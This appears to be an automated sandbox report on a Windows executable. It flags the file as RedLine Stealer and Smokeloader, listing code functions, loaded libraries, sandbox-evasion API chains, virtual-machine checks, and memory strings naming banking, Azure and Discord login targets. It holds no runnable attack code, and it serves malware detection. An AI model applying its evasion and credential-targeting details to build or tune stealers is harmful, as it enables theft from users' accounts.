                    Source: C:\Users\user\Desktop\OlZzqwjrwO.exeCode function: 0_2_0041E0830_2_0041E083
                    Source: C:\Users\user\Desktop\OlZzqwjrwO.exeCode function: 0_2_0044915B0_2_0044915B
                    Source: C:\Users\user\Desktop\OlZzqwjrwO.exeCode function: 0_2_0045D15A0_2_0045D15A
                    Source: C:\Users\user\Desktop\OlZzqwjrwO.exeCode function: 0_2_0041316D0_2_0041316D
                    Source: C:\Users\user\Desktop\OlZzqwjrwO.exeCode function: 0_2_0040112C0_2_0040112C
                    Source: C:\Users\user\Desktop\OlZzqwjrwO.exeCode function: 0_2_004279E00_2_004279E0
                    Source: C:\Users\user\Desktop\OlZzqwjrwO.exeCode function: 0_2_0041D1E90_2_0041D1E9
                    Source: C:\Users\user\Desktop\OlZzqwjrwO.exeCode function: 0_2_004109FC0_2_004109FC
                    Source: C:\Users\user\Desktop\OlZzqwjrwO.exeCode function: 0_2_0040D9940_2_0040D994
                    Source: C:\Users\user\Desktop\OlZzqwjrwO.exeCode function: 0_2_0044F2440_2_0044F244
                    Source: C:\Users\user\Desktop\OlZzqwjrwO.exeCode function: 0_2_0041AA490_2_0041AA49
                    Source: C:\Users\user\Desktop\OlZzqwjrwO.exeCode function: 0_2_0041B2510_2_0041B251
                    Source: C:\Users\user\Desktop\OlZzqwjrwO.exeCode function: 0_2_00429A5B0_2_00429A5B
                    Source: C:\Users\user\Desktop\OlZzqwjrwO.exeCode function: 0_2_004102180_2_00410218
                    Source: C:\Users\user\Desktop\OlZzqwjrwO.exeCode function: 0_2_00410A330_2_00410A33
                    Source: C:\Users\user\Desktop\OlZzqwjrwO.exeCode function: 0_2_00414A830_2_00414A83
                    Source: C:\Users\user\Desktop\OlZzqwjrwO.exeCode function: 0_2_0044234A0_2_0044234A
                    Source: C:\Users\user\Desktop\OlZzqwjrwO.exeCode function: 0_2_0040136E0_2_0040136E
                    Source: C:\Users\user\Desktop\OlZzqwjrwO.exeCode function: 0_2_00457B300_2_00457B30
                    Source: C:\Users\user\Desktop\OlZzqwjrwO.exeCode function: 0_2_004283340_2_00428334
                    Source: C:\Users\user\Desktop\OlZzqwjrwO.exeCode function: 0_2_0041EBEB0_2_0041EBEB
                    Source: C:\Users\user\Desktop\OlZzqwjrwO.exeCode function: 0_2_00415C7E0_2_00415C7E
                    Source: C:\Users\user\Desktop\OlZzqwjrwO.exeCode function: 0_2_004184130_2_00418413
                    Source: C:\Users\user\Desktop\OlZzqwjrwO.exeCode function: 0_2_0043A4FE0_2_0043A4FE
                    Source: C:\Users\user\Desktop\OlZzqwjrwO.exeCode function: 0_2_00424C8D0_2_00424C8D
                    Source: C:\Users\user\Desktop\OlZzqwjrwO.exeCode function: 0_2_0043BCA40_2_0043BCA4
                    Source: C:\Users\user\Desktop\OlZzqwjrwO.exeCode function: 0_2_004395350_2_00439535
                    Source: C:\Users\user\Desktop\OlZzqwjrwO.exeCode function: 0_2_0041764A0_2_0041764A
                    Source: C:\Users\user\Desktop\OlZzqwjrwO.exeCode function: 0_2_0043D6000_2_0043D600
                    Source: C:\Users\user\Desktop\OlZzqwjrwO.exeCode function: 0_2_004126B90_2_004126B9
                    Source: C:\Users\user\Desktop\OlZzqwjrwO.exeCode function: 0_2_004297300_2_00429730
                    Source: C:\Users\user\Desktop\OlZzqwjrwO.exeCode function: 0_2_00434FAC0_2_00434FAC
                    Source: C:\Users\user\Desktop\OlZzqwjrwO.exeCode function: 0_2_008B908F0_2_008B908F
                    Source: C:\Users\user\Desktop\OlZzqwjrwO.exeCode function: 0_2_008AD8BF0_2_008AD8BF
                    Source: C:\Users\user\Desktop\OlZzqwjrwO.exeCode function: 0_2_008978B10_2_008978B1
                    Source: C:\Users\user\Desktop\OlZzqwjrwO.exeCode function: 0_2_008B10D30_2_008B10D3
                    Source: C:\Users\user\Desktop\OlZzqwjrwO.exeCode function: 0_2_008BD8670_2_008BD867
                    Source: C:\Users\user\Desktop\OlZzqwjrwO.exeCode function: 0_2_008A99970_2_008A9997
                    Source: C:\Users\user\Desktop\OlZzqwjrwO.exeCode function: 0_2_008929200_2_00892920
                    Source: C:\Users\user\Desktop\OlZzqwjrwO.exeCode function: 0_2_0088BA830_2_0088BA83
                    Source: C:\Users\user\Desktop\OlZzqwjrwO.exeCode function: 0_2_008C12BE0_2_008C12BE
                    Source: C:\Users\user\Desktop\OlZzqwjrwO.exeCode function: 0_2_008922B40_2_008922B4
                    Source: C:\Users\user\Desktop\OlZzqwjrwO.exeCode function: 0_2_008A9ADA0_2_008A9ADA
                    Source: C:\Users\user\Desktop\OlZzqwjrwO.exeCode function: 0_2_008952D70_2_008952D7
                    Source: C:\Users\user\Desktop\OlZzqwjrwO.exeCode function: 0_2_0089E2EA0_2_0089E2EA
                    Source: C:\Users\user\Desktop\OlZzqwjrwO.exeCode function: 0_2_008B42E70_2_008B42E7
                    Source: C:\Users\user\Desktop\OlZzqwjrwO.exeCode function: 0_2_008B52130_2_008B5213
                    Source: C:\Users\user\Desktop\OlZzqwjrwO.exeCode function: 0_2_008AD2210_2_008AD221
                    Source: C:\Users\user\Desktop\OlZzqwjrwO.exeCode function: 0_2_008C8A670_2_008C8A67
                    Source: C:\Users\user\Desktop\OlZzqwjrwO.exeCode function: 0_2_0088AB8F0_2_0088AB8F
                    Source: C:\Users\user\Desktop\OlZzqwjrwO.exeCode function: 0_2_0088B3900_2_0088B390
                    Source: C:\Users\user\Desktop\OlZzqwjrwO.exeCode function: 0_2_0088E3B50_2_0088E3B5
                    Source: C:\Users\user\Desktop\OlZzqwjrwO.exeCode function: 0_2_008DD3C10_2_008DD3C1
                    Source: C:\Users\user\Desktop\OlZzqwjrwO.exeCode function: 0_2_008C93C20_2_008C93C2
                    Source: C:\Users\user\Desktop\OlZzqwjrwO.exeCode function: 0_2_008933D40_2_008933D4
                    Source: C:\Users\user\Desktop\OlZzqwjrwO.exeCode function: 0_2_0088DBFB0_2_0088DBFB
                    Source: C:\Users\user\Desktop\OlZzqwjrwO.exeCode function: 0_2_008B03F50_2_008B03F5
                    Source: C:\Users\user\Desktop\OlZzqwjrwO.exeCode function: 0_2_008BDB370_2_008BDB37
                    Source: C:\Users\user\Desktop\OlZzqwjrwO.exeCode function: 0_2_008AC3410_2_008AC341
                    Source: C:\Users\user\Desktop\OlZzqwjrwO.exeCode function: 0_2_008B048F0_2_008B048F
                    Source: C:\Users\user\Desktop\OlZzqwjrwO.exeCode function: 0_2_008CF4AB0_2_008CF4AB
                    Source: C:\Users\user\Desktop\OlZzqwjrwO.exeCode function: 0_2_0089B4B80_2_0089B4B8
                    Source: C:\Users\user\Desktop\OlZzqwjrwO.exeCode function: 0_2_0089ACB00_2_0089ACB0
                    Source: C:\Users\user\Desktop\OlZzqwjrwO.exeCode function: 0_2_008A9CC20_2_008A9CC2
                    Source: C:\Users\user\Desktop\OlZzqwjrwO.exeCode function: 0_2_008AF4DF0_2_008AF4DF
                    Source: C:\Users\user\Desktop\OlZzqwjrwO.exeCode function: 0_2_0089C4D70_2_0089C4D7
                    Source: C:\Users\user\Desktop\OlZzqwjrwO.exeCode function: 0_2_00886C080_2_00886C08
                    Source: C:\Users\user\Desktop\OlZzqwjrwO.exeCode function: 0_2_0089FC0B0_2_0089FC0B
                    Source: C:\Users\user\Desktop\OlZzqwjrwO.exeCode function: 0_2_008ABC2C0_2_008ABC2C
                    Source: C:\Users\user\Desktop\OlZzqwjrwO.exeCode function: 0_2_008A7C470_2_008A7C47
                    Source: C:\Users\user\Desktop\OlZzqwjrwO.exeCode function: 0_2_0089D4500_2_0089D450
                    Source: C:\Users\user\Desktop\OlZzqwjrwO.exeCode function: 0_2_0089047F0_2_0089047F
                    Source: C:\Users\user\Desktop\OlZzqwjrwO.exeCode function: 0_2_008864720_2_00886472
                    Source: C:\Users\user\Desktop\OlZzqwjrwO.exeCode function: 0_2_008A859B0_2_008A859B
                    Source: C:\Users\user\Desktop\OlZzqwjrwO.exeCode function: 0_2_008C25B10_2_008C25B1
                    Source: C:\Users\user\Desktop\OlZzqwjrwO.exeCode function: 0_2_008BB5C90_2_008BB5C9
                    Source: C:\Users\user\Desktop\OlZzqwjrwO.exeCode function: 0_2_008AA5D40_2_008AA5D4
                    Source: C:\Users\user\Desktop\OlZzqwjrwO.exeCode function: 0_2_00885D110_2_00885D11
                    Source: C:\Users\user\Desktop\OlZzqwjrwO.exeCode function: 0_2_008855400_2_00885540
                    Source: C:\Users\user\Desktop\OlZzqwjrwO.exeCode function: 0_2_008B6D430_2_008B6D43
                    Source: C:\Users\user\Desktop\OlZzqwjrwO.exeCode function: 0_2_008826DD0_2_008826DD
                    Source: C:\Users\user\Desktop\OlZzqwjrwO.exeCode function: 0_2_008A9EE20_2_008A9EE2
                    Source: C:\Users\user\Desktop\OlZzqwjrwO.exeCode function: 0_2_00895EE50_2_00895EE5
                    Source: C:\Users\user\Desktop\OlZzqwjrwO.exeCode function: 0_2_008A4EF40_2_008A4EF4
                    Source: C:\Users\user\Desktop\OlZzqwjrwO.exeCode function: 0_2_0089EE520_2_0089EE52
                    Source: C:\Users\user\Desktop\OlZzqwjrwO.exeCode function: 0_2_0089867A0_2_0089867A
                    Source: C:\Users\user\Desktop\OlZzqwjrwO.exeCode function: 0_2_008B979C0_2_008B979C
                    Source: C:\Users\user\Desktop\OlZzqwjrwO.exeCode function: 0_2_008AAFE90_2_008AAFE9
                    Source: C:\Users\user\Desktop\OlZzqwjrwO.exeCode function: 0_2_008BBF0B0_2_008BBF0B
                    Source: C:\Users\user\Desktop\OlZzqwjrwO.exeCode function: 0_2_008BA7650_2_008BA765
                    Source: C:\Users\user\Desktop\OlZzqwjrwO.exeProcess token adjusted: Load DriverJump to behavior
                    Source: C:\Users\user\Desktop\OlZzqwjrwO.exeCode function: String function: 00438E28 appears 39 times
                    Source: C:\Users\user\Desktop\OlZzqwjrwO.exeCode function: String function: 0088A905 appears 38 times
                    Source: C:\Users\user\Desktop\OlZzqwjrwO.exeCode function: String function: 0043D070 appears 51 times
                    Source: C:\Users\user\Desktop\OlZzqwjrwO.exeCode function: String function: 0088E3B5 appears 36 times
                    Source: C:\Users\user\Desktop\OlZzqwjrwO.exeCode function: String function: 0040E14E appears 52 times
                    Source: C:\Users\user\Desktop\OlZzqwjrwO.exeCode function: String function: 004360E1 appears 144 times
                    Source: C:\Users\user\Desktop\OlZzqwjrwO.exeCode function: String function: 008BD2D7 appears 50 times
                    Source: C:\Users\user\Desktop\OlZzqwjrwO.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7712 -s 1656
                    Source: OlZzqwjrwO.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                    Source: 00000000.00000002.3107115385.0000000000979000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
                    Source: 00000000.00000002.3106975275.0000000000880000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
                    Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@2/5@0/1
                    Source: C:\Users\user\Desktop\OlZzqwjrwO.exeCode function: 0_2_0097A27E CreateToolhelp32Snapshot,Module32First,0_2_0097A27E
                    Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7712
                    Source: C:\Windows\SysWOW64\WerFault.exeFile created: C:\ProgramData\Microsoft\Windows\WER\Temp\ce8d1ec1-1c36-4cc9-ac49-15346afedbc4Jump to behavior
                    Source: OlZzqwjrwO.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: C:\Users\user\Desktop\OlZzqwjrwO.exeSystem information queried: HandleInformationJump to behavior
                    Source: C:\Users\user\Desktop\OlZzqwjrwO.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                    Source: OlZzqwjrwO.exe, 00000000.00000002.3107915884.000000000305D000.00000004.00000020.00020000.00000000.sdmp, OlZzqwjrwO.exe, 00000000.00000002.3107514076.0000000002A73000.00000004.00000020.00020000.00000000.sdmp, OlZzqwjrwO.exe, 00000000.00000002.3107514076.0000000002A65000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                    Source: OlZzqwjrwO.exeReversingLabs: Detection: 89%
                    Source: unknownProcess created: C:\Users\user\Desktop\OlZzqwjrwO.exe "C:\Users\user\Desktop\OlZzqwjrwO.exe"
                    Source: C:\Users\user\Desktop\OlZzqwjrwO.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7712 -s 1656
                    Source: C:\Users\user\Desktop\OlZzqwjrwO.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Users\user\Desktop\OlZzqwjrwO.exeSection loaded: msimg32.dllJump to behavior
                    Source: C:\Users\user\Desktop\OlZzqwjrwO.exeSection loaded: msvcr100.dllJump to behavior
                    Source: C:\Users\user\Desktop\OlZzqwjrwO.exeSection loaded: fltlib.dllJump to behavior
                    Source: C:\Users\user\Desktop\OlZzqwjrwO.exeSection loaded: my-global-render.dllJump to behavior
                    Source: C:\Users\user\Desktop\OlZzqwjrwO.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\Desktop\OlZzqwjrwO.exeSection loaded: dpapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\OlZzqwjrwO.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Users\user\Desktop\OlZzqwjrwO.exeSection loaded: winhttp.dllJump to behavior
                    Source: C:\Users\user\Desktop\OlZzqwjrwO.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Users\user\Desktop\OlZzqwjrwO.exeSection loaded: webio.dllJump to behavior
                    Source: C:\Users\user\Desktop\OlZzqwjrwO.exeSection loaded: mswsock.dllJump to behavior
                    Source: C:\Users\user\Desktop\OlZzqwjrwO.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\OlZzqwjrwO.exeSection loaded: winnsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\OlZzqwjrwO.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\Desktop\OlZzqwjrwO.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\Desktop\OlZzqwjrwO.exeFile opened: C:\Windows\SysWOW64\msvcr100.dllJump to behavior

                    Data Obfuscation

                    barindex
                    Source: C:\Users\user\Desktop\OlZzqwjrwO.exeUnpacked PE file: 0.2.OlZzqwjrwO.exe.400000.0.unpack .text:ER;.data:W;.relo:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.reloc:R;
                    Source: C:\Users\user\Desktop\OlZzqwjrwO.exeUnpacked PE file: 0.2.OlZzqwjrwO.exe.400000.0.unpack
                    Source: OlZzqwjrwO.exeStatic PE information: section name: .relo
                    Source: C:\Users\user\Desktop\OlZzqwjrwO.exeCode function: 0_2_00464074 push B000468Ch; retn 0044h0_2_00464079
                    Source: C:\Users\user\Desktop\OlZzqwjrwO.exeCode function: 0_2_00463CAD push esi; ret 0_2_00463CB6
                    Source: C:\Users\user\Desktop\OlZzqwjrwO.exeCode function: 0_2_00403D6C push eax; mov dword ptr [esp], 00000000h0_2_00403D71
                    Source: C:\Users\user\Desktop\OlZzqwjrwO.exeCode function: 0_2_00452768 push ecx; ret 0_2_0045277B
                    Source: C:\Users\user\Desktop\OlZzqwjrwO.exeCode function: 0_2_008D29CF push ecx; ret 0_2_008D29E2
                    Source: C:\Users\user\Desktop\OlZzqwjrwO.exeCode function: 0_2_00883FD3 push eax; mov dword ptr [esp], 00000000h0_2_00883FD8
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                    Malware Analysis System Evasion

                    barindex
                    Source: C:\Users\user\Desktop\OlZzqwjrwO.exeCode function: 0_2_00401FF9 Sleep,ExitProcess,0_2_00401FF9
                    Source: C:\Users\user\Desktop\OlZzqwjrwO.exeCode function: 0_2_00401FF9 Sleep,ExitProcess,0_2_00401FF9
                    Source: C:\Users\user\Desktop\OlZzqwjrwO.exeCode function: 0_2_00882260 Sleep,ExitProcess,0_2_00882260
                    Source: C:\Users\user\Desktop\OlZzqwjrwO.exeEvasive API call chain: GetComputerName,DecisionNodes,ExitProcessgraph_0-73731
                    Source: C:\Users\user\Desktop\OlZzqwjrwO.exeEvasive API call chain: GetPEB, DecisionNodes, Sleepgraph_0-73669
                    Source: C:\Users\user\Desktop\OlZzqwjrwO.exeEvasive API call chain: GetPEB, DecisionNodes, ExitProcessgraph_0-73681
                    Source: C:\Users\user\Desktop\OlZzqwjrwO.exeSystem information queried: FirmwareTableInformationJump to behavior
                    Source: C:\Users\user\Desktop\OlZzqwjrwO.exeCode function: 0_2_00429EF7 rdtsc 0_2_00429EF7
                    Source: C:\Users\user\Desktop\OlZzqwjrwO.exeCode function: 0_2_0041F9A4 GetCurrentProcessId,NtDuplicateObject,NtClose,GetProcessId,NtQuerySystemInformation,NtQuerySystemInformation,0_2_0041F9A4
                    Source: C:\Users\user\Desktop\OlZzqwjrwO.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodesgraph_0-73841
                    Source: C:\Users\user\Desktop\OlZzqwjrwO.exeEvasive API call chain: RegOpenKey,DecisionNodes,Sleepgraph_0-73782
                    Source: C:\Users\user\Desktop\OlZzqwjrwO.exeEvasive API call chain: RegQueryValue,DecisionNodes,ExitProcessgraph_0-73775
                    Source: C:\Users\user\Desktop\OlZzqwjrwO.exeEvasive API call chain: RegQueryValue,DecisionNodes,Sleepgraph_0-73775
                    Source: C:\Users\user\Desktop\OlZzqwjrwO.exeEvasive API call chain: RegOpenKey,DecisionNodes,ExitProcessgraph_0-73782
                    Source: C:\Users\user\Desktop\OlZzqwjrwO.exeCode function: 0_2_00451F08 FindFirstFileExW,0_2_00451F08
                    Source: C:\Users\user\Desktop\OlZzqwjrwO.exeCode function: 0_2_00451FBC FindFirstFileExW,FindNextFileW,FindClose,FindClose,0_2_00451FBC
                    Source: C:\Users\user\Desktop\OlZzqwjrwO.exeCode function: 0_2_008D216F FindFirstFileExW,0_2_008D216F
                    Source: C:\Users\user\Desktop\OlZzqwjrwO.exeCode function: 0_2_008D2223 FindFirstFileExW,FindNextFileW,FindClose,FindClose,0_2_008D2223
                    Source: Amcache.hve.8.drBinary or memory string: VMware
                    Source: OlZzqwjrwO.exe, 00000000.00000003.1890787358.00000000030B7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: global block list test formVMware20,11696497155
                    Source: OlZzqwjrwO.exe, 00000000.00000003.1890787358.00000000030B7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - COM.HKVMware20,11696497155
                    Source: Amcache.hve.8.drBinary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                    Source: OlZzqwjrwO.exe, 00000000.00000002.3107144031.00000000009FA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                    Source: OlZzqwjrwO.exe, 00000000.00000002.3107514076.0000000002A9F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWh
                    Source: Amcache.hve.8.drBinary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
                    Source: OlZzqwjrwO.exe, 00000000.00000003.1890787358.00000000030B7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ms.portal.azure.comVMware20,11696497155
                    Source: OlZzqwjrwO.exe, 00000000.00000003.1890787358.00000000030B7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: bankofamerica.comVMware20,11696497155x
                    Source: OlZzqwjrwO.exe, 00000000.00000003.1890787358.00000000030B7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696497155p
                    Source: OlZzqwjrwO.exe, 00000000.00000003.1890787358.00000000030B7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU WestVMware20,11696497155n
                    Source: OlZzqwjrwO.exe, 00000000.00000003.1890787358.00000000030B7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: interactivebrokers.co.inVMware20,11696497155d
                    Source: Amcache.hve.8.drBinary or memory string: vmci.sys
                    Source: OlZzqwjrwO.exe, 00000000.00000003.1890787358.00000000030B7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696497155x
                    Source: OlZzqwjrwO.exe, 00000000.00000003.1890252902.0000000002FD8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: - GDCDYNVMware20,11696497155p
                    Source: OlZzqwjrwO.exe, 00000000.00000003.1890787358.00000000030B7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696497155}
                    Source: Amcache.hve.8.drBinary or memory string: VMware20,1
                    Source: OlZzqwjrwO.exe, 00000000.00000003.1890787358.00000000030B7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696497155^
                    Source: OlZzqwjrwO.exe, 00000000.00000003.1890787358.00000000030B7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: account.microsoft.com/profileVMware20,11696497155u
                    Source: Amcache.hve.8.drBinary or memory string: Microsoft Hyper-V Generation Counter
                    Source: Amcache.hve.8.drBinary or memory string: NECVMWar VMware SATA CD00
                    Source: Amcache.hve.8.drBinary or memory string: VMware Virtual disk SCSI Disk Device
                    Source: Amcache.hve.8.drBinary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
                    Source: OlZzqwjrwO.exe, 00000000.00000003.1890787358.00000000030B7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: discord.comVMware20,11696497155f
                    Source: Amcache.hve.8.drBinary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
                    Source: Amcache.hve.8.drBinary or memory string: VMware PCI VMCI Bus Device
                    Source: OlZzqwjrwO.exe, 00000000.00000003.1890787358.00000000030B7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: netportal.hdfcbank.comVMware20,11696497155
                    Source: Amcache.hve.8.drBinary or memory string: VMware VMCI Bus Device
                    Source: Amcache.hve.8.drBinary or memory string: VMware Virtual RAM
